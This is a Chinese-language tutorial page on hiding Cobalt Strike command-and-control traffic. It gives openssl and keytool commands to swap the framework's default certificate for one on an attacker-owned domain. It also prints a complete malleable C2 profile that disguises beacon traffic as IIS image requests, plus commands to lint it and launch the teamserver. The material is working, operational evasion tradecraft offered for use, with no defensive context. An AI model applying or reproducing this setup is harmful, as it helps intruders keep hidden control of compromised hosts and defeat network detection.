CobaltStrike 流量隐藏

本文涉及的产品
.cn 域名,1个 12个月
简介: CobaltStrike 流量隐藏

0x1 https流量隐藏

       前言:经过https加密后的流量虽然不是明文,但是cobaltstrike的默认证书有很多敏感文字,

               非常容易被识别。除此之外,使用默认的证书,流量也很容易被解密;

      解决:生成个人域名的证书;步骤如下:

       1. 去申请一个个人域名,推荐 https://www.namecheap.com/

       2.去给域名申请一个证书,下载证书压缩包;推荐

       3.上传证书压缩包到 cobaltstrike 目录,并解压;

       4.将证书转成 cobaltstrike.store 格式;

## 将公钥、私钥等转换格式
openssl pkcs12 -export -in {公钥文件} -inkey {私钥文件} -out {输出文件的命名} -name {证书对应的域名} -passout pass:{设置证书密码,需要记住}
openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.cseroadweb.xyz.p12 -name cdn.cseroadweb.xyz -passout pass:ccc123456
## 使用keytool生成 store 证书
keytool -importkeystore -deststorepass {上一步设置的密码} -destkeypass {上一步设置的密码} -destkeystore {输出文件的命名} -srckeystore {上一步输出的文件的路径} -srcstoretype PKCS12 -srcstorepass {上一步设置的密码} -alias {证书对应的域名}
keytool -importkeystore -deststorepass ccc123456 -destkeypass ccc123456 -destkeystore new.store -srckeystore cdn.cseroadweb.xyz.p12 -srcstoretype PKCS12 -srcstorepass ccc123456 -alias cdn.cseroadweb.xyz
## 生成store证书后,有1个warning,最好再对证书进行一个格式转换;new-2.store 是刚刚生成的store证书;
keytool -importkeystore -srckeystore new-2.store -destkeystore new-2.store -deststoretype pkcs12

       5.替换服务端与客户端通话的证书;

               修改teamserver,将 cobaltstrike.store 替换成我们生成的store证书;

       6.替换 web https 默认证书;

               6.1创建 profile文件,写下如下内容;

set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
http-post {
    set uri "/history/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".asp";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
https-certificate {
    set keystore "new.store";
    set password "Testaaa@1234";
}

                6.2 验证 profile 是否可用;

                        ./c2lint profile

       7. 启动cobaltstrike 服务端;设置profile 运行 teamserver;

               ./teamserver xx.xx.xx.xx passwd profile

       

       8.验证:访问cobaltstrike 服务端口、cobaltstrike listener 端口;查看证书,看到证书已经

           替换成我们的私人证书了;            

 

 

目录
相关文章
|
前端开发
如何利用dnslog探测目标主机杀软
如何利用dnslog探测目标主机杀软
213 0
|
3月前
|
网络协议 安全 网络安全
DNS放大攻击
【8月更文挑战第20天】
183 1
|
3月前
|
运维 Linux 网络安全
"揭秘Traceroute穿越防火墙的隐形障碍:为何路径追踪在此中断?解锁隐藏的网络回显之谜!"
【8月更文挑战第19天】Traceroute是网络故障排查的关键工具,用于追踪数据包路径。但防火墙常致回显问题,表现为路由节点信息缺失。本文通过案例分析此现象:数据包遇防火墙时,因安全策略拦截ICMP或UDP数据包而显示星号。解决方法包括检查防火墙策略以确保ICMP和UDP端口未被阻止,在Linux中使用ICMP版本的Traceroute(如`traceroute -I`),关闭防火墙接口管理功能,或调整安全策略以限制Traceroute访问。针对具体网络环境灵活运用这些策略可有效解决问题。
134 0
|
6月前
|
Linux 网络安全 Windows
如何通过隐藏服务器真实IP来防御DDOS攻击
如何通过隐藏服务器真实IP来防御DDOS攻击
|
数据库
七层登陆——内有详细注释
七层登陆——内有详细注释
|
安全 网络安全 数据库
阿里云区域服务内容:网站服务器中毒了,如何处理
 好不容易做好的网站,如果服务器经常中毒,网站打不开,岂不是令人十分头疼的事情。下面,阿里云区域服务商武汉捷讯小编为大家来支招。
3383 0
被阿里云绿网屏蔽页面解封方法
阿里绿网是阿里云针对旗下云服务器推出的一款检测违规信息的产品 绿网会针对阿里云服务器上的网站进行自动扫描检测,并对违规页面自动屏蔽 但有时这种屏蔽并不准确,在移除违规信息后,我们可以申请人工解封
4476 0